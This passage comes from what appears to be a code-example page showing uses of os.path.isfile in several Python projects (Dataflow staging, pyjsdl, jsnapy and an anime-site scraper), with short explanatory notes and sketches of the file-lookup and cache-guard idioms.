          'setup.py instead of %s' % setup_options.setup_file)
    tarball_file = _build_setup_package(setup_options.setup_file, temp_dir,
                                        build_setup_args)
    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  WORKFLOW_TARBALL_FILE)
    file_copy(tarball_file, staged_path)
    resources.append(WORKFLOW_TARBALL_FILE)

  # Handle extra local packages that should be staged.
  if setup_options.extra_packages is not None:
    resources.extend(
        _stage_extra_packages(setup_options.extra_packages,
                              google_cloud_options.staging_location,
                              file_copy=file_copy,
                              temp_dir=temp_dir))

  # Pickle the main session if requested.
  # We will create the pickled main session locally and then copy it to the
  # staging location because the staging location is a GCS path and the file
  # cannot be created directly there.
  if setup_options.save_main_session:
    pickled_session_file = os.path.join(temp_dir,
                                        names.PICKLED_MAIN_SESSION_FILE)
    pickler.dump_session(pickled_session_file)
    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  names.PICKLED_MAIN_SESSION_FILE)
    file_copy(pickled_session_file, staged_path)
    resources.append(names.PICKLED_MAIN_SESSION_FILE)

  if hasattr(setup_options, 'sdk_location') and setup_options.sdk_location:
    if setup_options.sdk_location == 'default':
      stage_tarball_from_remote_location = True
    elif (setup_options.sdk_location.startswith('gs://') or
          setup_options.sdk_location.startswith('http://') or
          setup_options.sdk_location.startswith('https://')):
      stage_tarball_from_remote_location = True
    else:
      stage_tarball_from_remote_location = False

    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  names.DATAFLOW_SDK_TARBALL_FILE)
    if stage_tarball_from_remote_location:
      # If --sdk_location is not specified then the appropriate URL is built
      # based on the version of the currently running SDK. If the option is
      # present then no version matching is made and the exact URL or path
      # is expected.
      #
      # Unit tests running in the 'python setup.py test' context will
      # not have the sdk_location attribute present and therefore we
      # will not stage a tarball.
      if setup_options.sdk_location == 'default':
        sdk_remote_location = '%s/v%s.tar.gz' % (
            PACKAGES_URL_PREFIX, __version__)
      else:
        sdk_remote_location = setup_options.sdk_location
      _stage_dataflow_sdk_tarball(sdk_remote_location, staged_path, temp_dir)
      resources.append(names.DATAFLOW_SDK_TARBALL_FILE)
    else:
      # Check if we have a local Dataflow SDK tarball present. This branch is
      # used by tests running with the SDK built at head.
      if setup_options.sdk_location == 'default':
        module_path = os.path.abspath(__file__)
        sdk_path = os.path.join(
            os.path.dirname(module_path), '..', names.DATAFLOW_SDK_TARBALL_FILE)
      elif os.path.isdir(setup_options.sdk_location):
        sdk_path = os.path.join(
            setup_options.sdk_location, names.DATAFLOW_SDK_TARBALL_FILE)
      else:
        sdk_path = setup_options.sdk_location
      if os.path.isfile(sdk_path):
        logging.info('Copying dataflow SDK "%s" to staging location.', sdk_path)
        file_copy(sdk_path, staged_path)
        resources.append(names.DATAFLOW_SDK_TARBALL_FILE)
      else:
        if setup_options.sdk_location == 'default':
          raise RuntimeError('Cannot find default Dataflow SDK tar file "%s"'
                             % sdk_path)
        else:
          raise RuntimeError(
              'The file "%s" cannot be found. Its location was specified by '
              'the --sdk_location command-line option.' %
              sdk_path)

  # Delete all temp files created while staging job resources.
  shutil.rmtree(temp_dir)
  return resources
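
Note: stage_job_resources() uses os.path.isfile to fail fast on user-supplied
paths, and every error message names the command-line flag the bad path came
from. A minimal sketch of that validation idiom, with a hypothetical helper:

import os

# Validate a user-supplied path and point the error back at the flag it
# was passed through, as the --requirements_file check does above.
def require_file(path, flag):
    if not os.path.isfile(path):
        raise RuntimeError('The file %s cannot be found. It was specified '
                           'in the %s command line option.' % (path, flag))

require_file('setup.py', '--setup_file')  # raises unless ./setup.py exists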

Example 12

Project: pyjsdl
Source File: browser.py
View license
    def _generate_app_file(self, platform):
        # TODO: cache busting
        template = self.read_boilerplate('all.cache.html')
        name_parts = [self.top_module, platform, 'cache.html']
        done = self.done[platform]
        len_output_dir = len(self.output)+1

        app_name = self.top_module
        platform_name = platform.lower()
        dynamic = 0,
        app_headers = ''
        available_modules = self.unique_list_values(self.visited_modules[platform])
        early_static_app_libs = [] + self.early_static_app_libs
        static_app_libs = []
        dynamic_app_libs = []
        dynamic_js_libs = [] + self.dynamic_js_libs
        static_js_libs = [] + self.static_js_libs
        early_static_js_libs = [] + self.early_static_js_libs
        late_static_js_libs = [] + self.late_static_js_libs
        dynamic_modules = []
        not_unlinked_modules = [re.compile(m[1:]) for m in self.unlinked_modules if m[0] == '!']
        for m in required_modules:
            not_unlinked_modules.append(re.compile('^%s$' % m))
        unlinked_modules = [re.compile(m) for m in self.unlinked_modules if m[0] != '!' and m not in not_unlinked_modules]

        def static_code(libs, msg = None):
            code = []
            for lib in libs:
                fname = lib
                if not os.path.isfile(fname):
                    fname = os.path.join(self.output, lib)
                if not os.path.isfile(fname):
                    raise RuntimeError('File not found %r' % lib)
                if fname[len_output_dir:] == self.output:
                    name = fname[len_output_dir:]
                else:
                    name = os.path.basename(lib)
                code.append('<script type="text/javascript"><!--')
                if not msg is None:
                    code.append("/* start %s: %s */" % (msg, name))
                f = file(fname)
                code.append(f.read())
                if not msg is None:
                    code.append("/* end %s */" % (name,))
                code.append("""--></script>""")
                self.remove_files[fname] = True
                fname = fname.split('.')
                if fname[-2] == '__%s__' % platform_name:
                    del fname[-2]
                    fname = '.'.join(fname)
                    if os.path.isfile(fname):
                        self.remove_files[fname] = True
            return "\n".join(code)

        def js_modname(path):
            return 'js@'+os.path.basename(path)+'.'+md5(path).hexdigest()

        def skip_unlinked(lst):
            new_lst = []
            pltfrm = '__%s__' % platform_name
            for path in lst:
                fname = os.path.basename(path).rpartition(pyjs.MOD_SUFFIX)[0]
                frags = fname.split('.')
                # TODO: do not combine module chunks until we write the file
                if self.cache_buster and len(frags[-1])==32 and len(frags[-1].strip('0123456789abcdef'))==0:
                    frags.pop()
                if frags[-1] == pltfrm:
                    frags.pop()
                fname = '.'.join(frags)
                in_not_unlinked_modules = False
                for m in not_unlinked_modules:
                    if m.match(fname):
                        in_not_unlinked_modules = True
                        new_lst.append(path)
                        break
                if not in_not_unlinked_modules:
                    in_unlinked_modules = False
                    for m in unlinked_modules:
                        if m.match(fname):
                            in_unlinked_modules = True
                            if fname in available_modules:
                                available_modules.remove(fname)
                    if not in_unlinked_modules:
                        new_lst.append(path)
            return new_lst

        if self.multi_file:
            dynamic_js_libs = self.unique_list_values(dynamic_js_libs + [m for m in list(self.js_libs) if not m in static_js_libs])
            dynamic_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])
        else:
            static_js_libs = self.unique_list_values(static_js_libs + [m for m in list(self.js_libs) if not m in dynamic_js_libs])
            static_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])

        dynamic_js_libs = skip_unlinked(dynamic_js_libs)
        dynamic_app_libs = skip_unlinked(dynamic_app_libs)
        static_js_libs = skip_unlinked(static_js_libs)
        static_app_libs = skip_unlinked(static_app_libs)

        dynamic_modules = self.unique_list_values(available_modules + [js_modname(lib) for lib in dynamic_js_libs])
        available_modules = self.unique_list_values(available_modules + early_static_app_libs + dynamic_modules)
        if len(dynamic_modules) > 0:
            dynamic_modules = "['" + "','".join(dynamic_modules) + "']"
        else:
            dynamic_modules = "[]"
        appscript = "<script><!--\n$wnd['__pygwt_modController']['init']($pyjs['appname'], window)\n$wnd['__pygwt_modController']['load']($pyjs['appname'], [\n'%s'\n])\n--></script>"
        jsscript = """<script type="text/javascript" src="%(path)s" onload="$pyjs['script_onload']('%(modname)s')" onreadystatechange="$pyjs['script_onreadystate']('%(modname)s')"></script>"""
        dynamic_app_libs = appscript % "',\n'".join([lib[len_ouput_dir:].replace('\\', '/') for lib in dynamic_app_libs])
        dynamic_js_libs = '\n'.join([jsscript % {'path': lib, 'modname': js_modname(lib)} for lib in dynamic_js_libs])
        early_static_app_libs = static_code(early_static_app_libs)
        static_app_libs = static_code(static_app_libs)
        early_static_js_libs = static_code(early_static_js_libs, "javascript lib")
        static_js_libs = static_code(static_js_libs, "javascript lib")
        late_static_js_libs = static_code(late_static_js_libs, "javascript lib")

        setoptions = "\n".join([("$pyjs['options']['%s'] = %s;" % (n, v)).lower() for n,v in self.runtime_options])

        file_contents = template % locals()
        if self.cache_buster:
            md5sum = md5(file_contents).hexdigest()
            name_parts.insert(2, md5sum)
        out_path = os.path.join(self.output, '.'.join((name_parts)))

        out_file = file(out_path, 'w')
        out_file.write(file_contents)
        out_file.close()
        return out_path
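
The os.path.isfile calls in static_code above implement a two-step lookup: the library path is tried exactly as given, then the same name is tried under the output directory, and a RuntimeError is raised if neither resolves to a regular file. A minimal standalone sketch of that pattern, where resolve_lib and output_dir are illustrative names rather than part of pyjs:

import os

def resolve_lib(lib, output_dir):
    # Try the path exactly as supplied first.
    fname = lib
    if not os.path.isfile(fname):
        # Fall back to the same file name inside the output directory.
        fname = os.path.join(output_dir, lib)
    if not os.path.isfile(fname):
        # Neither location holds a regular file: fail loudly.
        raise RuntimeError('File not found %r' % lib)
    return fname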

Example 13

Project: jsnapy
Source File: check.py
View license
    def generate_test_files(
            self, main_file, device, check, diff, db, snap_del, pre=None, action=None, post=None):
        """
        generate names of snap files from the hostname and the output files given
        by the user; tests are performed on the values stored in these snap files
        :param main_file: main config file, to extract test files user wants to run
        :param device: device name
        :param check: variable to check if --check option is given or not
        :param diff: variable to check if --diff option is given or not
        :param db: database object
        :param snap_del: if --snapcheck option is used without any test file name,
                        it will create a temporary file and delete it at the end
        :param pre: file name of pre snapshot
        :param post: file name of post snapshot
        :param action: given by module version, either snap, snapcheck or check
        :return: object of operator.Operator containing test details
        """
        op = Operator()
        op.device = device
        tests_files = []
        self.log_detail['hostname'] = device
        # get the test files from config.yml
        if main_file.get('tests') is None:
            self.logger_check.error(
                colorama.Fore.RED +
                "\nERROR!! No test file found, Please mention test files !!", extra=self.log_detail)
        else:
            # extract test files, first search in path given in jsnapy.cfg
            for tfile in main_file.get('tests'):
                if not os.path.isfile(tfile):
                    tfile = os.path.join(
                        get_path(
                            'DEFAULT',
                            'test_file_path'),
                        tfile)
                if os.path.isfile(tfile):
                    test_file = open(tfile, 'r')
                    tests_files.append(yaml.load(test_file))
                else:
                    self.logger_check.error(
                        colorama.Fore.RED +
                        "ERROR!! File %s not found for testing" %
                        tfile,
                        extra=self.log_detail)

            # check what all test cases need to be included, if nothing given
            # then include all test cases ####
            for tests in tests_files:
                tests_included = []
                if 'tests_include' in tests:
                    tests_included = tests.get('tests_include')
                else:
                    for t in tests:
                        tests_included.append(t)
                message= self._print_testmssg("Device: "+device, "*")
                self.logger_check.info(colorama.Fore.BLUE + message, extra=self.log_detail)
                for val in tests_included:
                    self.logger_check.info(
                        "Tests Included: %s " %
                        (val),
                        extra=self.log_detail)
                    try:
                        if tests[val][0].keys()[0] == 'command':
                            command = tests[val][0].get('command').split('|')[0].strip()
                            reply_format = tests[val][0].get('format', 'xml')
                            message = self._print_testmssg("Command: "+command, "*")
                        
                            self.logger_check.info(
                                colorama.Fore.BLUE +
                                message,
                                extra=self.log_detail)
                        
                            name = '_'.join(command.split())
                            teston = command
                        else:
                            rpc = tests[val][0]['rpc']
                            reply_format = tests[val][0].get('format', 'xml')
                            self.logger_check.info(colorama.Fore.BLUE + (25) * "*" + "RPC is " +
                                                   rpc + (25) * '*', extra=self.log_detail)
                            name = rpc
                            teston = rpc
                    except KeyError:
                        self.logger_check.error(
                            colorama.Fore.RED +
                            "ERROR occurred, test keys 'command' or 'rpc' not defined properly", extra=self.log_detail)
                    except Exception as ex:
                        self.logger_check.error(
                            colorama.Fore.RED +
                            "ERROR Occurred: %s" % str(ex), extra=self.log_detail)
                    else:
                        # extract snap files if check from sqlite is true
                        if db.get(
                                'check_from_sqlite') is True and (check is True or diff is True or action in ["check", "diff"]):
                            a = SqliteExtractXml(db.get('db_name'))
                            # while checking from database, preference is given
                            # to id and then snap name
                            if (db['first_snap_id'] is not None) and (
                                    db['second_snap_id'] is not None):
                                snapfile1, data_format1 = a.get_xml_using_snap_id(
                                    str(device), name, db['first_snap_id'])
                                snapfile2, data_format2 = a.get_xml_using_snap_id(
                                    str(device), name, db['second_snap_id'])
                            else:
                                snapfile1, data_format1 = a.get_xml_using_snapname(
                                    str(device), name, pre)
                                snapfile2, data_format2 = a.get_xml_using_snapname(
                                    str(device), name, post)
                            if reply_format != data_format1 or reply_format != data_format2:
                                self.logger_check.error(colorama.Fore.RED + "ERROR!! Data stored in database is not in %s format."
                                                        % reply_format, extra=self.log_detail)
                                pass
                                # sys.exit(1)
                        ###### taking snapshot for --snapcheck operation ####
                        elif db.get('check_from_sqlite') is True:
                            a = SqliteExtractXml(db.get('db_name'))
                            snapfile1, data_format1 = a.get_xml_using_snapname(
                                str(device), name, pre)
                            if reply_format != data_format1:
                                self.logger_check.error(
                                    colorama.Fore.RED +
                                    "ERROR!! Data stored in database is not in %s format." %
                                    reply_format,
                                    extra=self.log_detail)
                                pass
                                # sys.exit(1)
                        else:
                            snapfile1 = self.generate_snap_file(
                                device,
                                pre,
                                name,
                                reply_format)

                        # if check is true then call function to compare two
                        # snapshots ####
                        if (check is True or action == "check") and reply_format == 'xml':
                            if db.get('check_from_sqlite') is False:
                                snapfile2 = self.generate_snap_file(
                                    device,
                                    post,
                                    name,
                                    reply_format)
                            self.compare_reply(
                                op,
                                tests[val],
                                val,
                                teston,
                                check,
                                db,
                                snapfile1,
                                snapfile2,
                                action)

                        # if --diff is true then call compare_diff to compare
                        # two snapshots word by word ####
                        elif(diff is True):
                            if db.get('check_from_sqlite') is False:
                                snapfile2 = self.generate_snap_file(
                                    device,
                                    post,
                                    name,
                                    reply_format)
                            self.compare_diff(
                                snapfile1,
                                snapfile2,
                                db.get('check_from_sqlite'))

                        # else call --snapcheck test operation, it works only
                        # for xml reply format   ####
                        elif (reply_format == 'xml'):
                            self.compare_reply(
                                op,
                                tests[val],
                                val,
                                teston,
                                check,
                                db,
                                snapfile1,
                                action)
                            ######## bug here ############
                            # multiple testcases for single command and same device, its deleting that file
                            ####################
                            """
                            if snap_del is True:
                                snapfile1 = snapfile1 if os.path.isfile(snapfile1) else self.generate_snap_file(device, pre, name, reply_format)
                                os.remove(snapfile1)
                                """
                        else:
                            # give error message if snapshot in text format is
                            # used with operations other than --diff  ####
                            self.logger_check.error(
                                colorama.Fore.RED +
                                "ERROR!! for checking snapshots in text format use '--diff' option ", extra=self.log_detail)

            # print final result, if operation is --diff then message gets
            # printed compare_diff function only ####
            if (diff is not True):
                op.final_result(self.log_detail)

        return op
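
generate_test_files uses the same resolve-then-verify idiom: a test file name from the config is first tried as given, then joined with the directory configured in jsnapy.cfg, and it is only opened once os.path.isfile confirms the result; otherwise an error is logged and the loop continues. A rough standalone equivalent, where find_test_file and search_dir are hypothetical names introduced for illustration:

import os

def find_test_file(tfile, search_dir):
    # Accept an absolute or relative path that already points at a file.
    if not os.path.isfile(tfile):
        # Otherwise look for the bare name inside the configured directory.
        tfile = os.path.join(search_dir, tfile)
    # Return None instead of raising, so the caller can log and move on.
    return tfile if os.path.isfile(tfile) else None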

Example 14

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m
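
Every branch of getEpnList guards its poster download the same way: the image is fetched only when /tmp/AnimeWatch/<name>.jpg is not already on disk, so repeated calls reuse the cached copy. A self-contained sketch of that guard, substituting the standard library's urlretrieve for the project-specific ccurlNew helper:

import os

try:
    from urllib import urlretrieve           # Python 2
except ImportError:
    from urllib.request import urlretrieve   # Python 3

def cache_poster(img_url, picn):
    # Download only when the cached copy is missing; the os.path.isfile
    # guard keeps re-runs from hitting the network again.
    if img_url and not os.path.isfile(picn):
        urlretrieve(img_url, picn)
    return picn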

Example 16

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content)
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m
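
Note that os.path.isfile returns False both for paths that do not exist and for paths that exist but are not regular files, which is why these guards stay safe even if something else creates a directory at the cache path. A quick demonstration:

import os
import tempfile

d = tempfile.mkdtemp()
print(os.path.isfile(d))                                # False: a directory
print(os.path.isfile(os.path.join(d, 'missing.jpg')))   # False: no such path
open(os.path.join(d, 'poster.jpg'), 'w').close()
print(os.path.isfile(os.path.join(d, 'poster.jpg')))    # True: a regular file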

Example 20

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
